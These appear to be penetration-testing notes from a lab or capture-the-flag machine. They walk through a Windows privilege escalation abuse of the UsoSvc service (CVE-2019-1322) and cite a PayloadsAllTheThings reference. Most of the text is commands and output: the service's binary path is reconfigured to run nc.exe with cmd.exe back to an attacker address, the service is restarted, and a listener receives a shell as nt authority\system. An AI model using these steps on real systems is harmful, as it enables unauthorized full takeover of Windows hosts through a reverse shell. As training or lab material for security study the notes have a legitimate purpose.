8 privesc_2 UsoSvc
# PEAS shows we have all access to UsoSvc
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#example-with-windows-10---cve-2019-1322-usosvc
C:\inetpub\new-site>sc stop UsoSvc
sc stop UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 3 STOP_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x6
WAIT_HINT : 0x7530
C:\inetpub\new-site>sc query UsoSvc
sc query UsoSvc
SERVICE_NAME: UsoSvc
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
C:\inetpub\new-site>sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
sc.exe config UsoSvc binpath= "C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\new-site>sc.exe qc usosvc
sc.exe qc usosvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: usosvc
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Users\public\nc.exe 10.10.16.7 9090 -e cmd.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Update Orchestrator Service
DEPENDENCIES : rpcss
SERVICE_START_NAME : LocalSystem
C:\inetpub\new-site>sc start UsoSvc
$ nc -lvnp 9090
listening on [any] 9090 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.97] 53623
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
Last updated